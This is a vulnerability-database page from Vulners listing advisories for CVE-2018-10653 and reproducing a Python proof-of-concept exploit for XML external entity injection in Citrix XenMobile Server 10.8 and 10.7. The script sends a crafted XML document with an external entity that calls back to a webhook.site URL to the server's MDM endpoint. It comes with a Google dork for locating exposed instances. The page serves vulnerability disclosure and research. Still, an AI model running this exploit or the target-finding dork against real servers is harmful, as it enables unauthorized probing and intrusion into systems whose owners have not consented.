Vulners
Lucene search
Citrix XenMobile Server 10.8 XML Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Citrix XenMobile Server 10.8 - XML External Entity Injection Exploit | 23 Jan 202000:00 | – | zdt |
 | Citrix XenMobile Server XML External Entity Handling Vulnerability | 24 May 201800:00 | – | cnvd |
 | Citrix XenMobile XML External Entity Injection (CVE-2018-10653) | 31 Mar 202000:00 | – | checkpoint_advisories |
 | Citrix XenMobile 10.x Multiple Security Updates | 21 May 201804:00 | – | citrix |
 | CVE-2018-10653 | 23 May 201817:00 | – | cve |
 | CVE-2018-10653 | 23 May 201817:00 | – | cvelist |
 | Citrix XenMobile Server 10.8 - XML External Entity Injection | 22 Jan 202000:00 | – | exploitdb |
 | EUVD-2018-2725 | 23 May 201817:00 | – | euvd |
 | Citrix XenMobile Server 10.8 - XML External Entity Injection | 22 Jan 202000:00 | – | exploitpack |
 | CVE-2018-10653 | 23 May 201817:29 | – | nvd |
10
`# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653
#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
<[email protected]> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##
import requests
import sys
from pprint import pprint
import uuid
# Surf to https://webhook.site and copy/paste the URL below. Used for
XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"
id = str(uuid.uuid1())
xml = '''<?xml version="1.0" encoding="UTF-8"
standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' +
WEBHOOK + id + '''/test.dtd">%j00t9; ]>'''
print(id)
response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
headers=
{'User-Agent': 'MDM/1.0',
'Connection': 'close',
'Content-Type': 'application/x-apple-aspen-mdm'},
data=xml,stream=True
)
print(response.content)
print(response.text)
pprint(response)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jan 2020 00:00Current
EPSS0.11484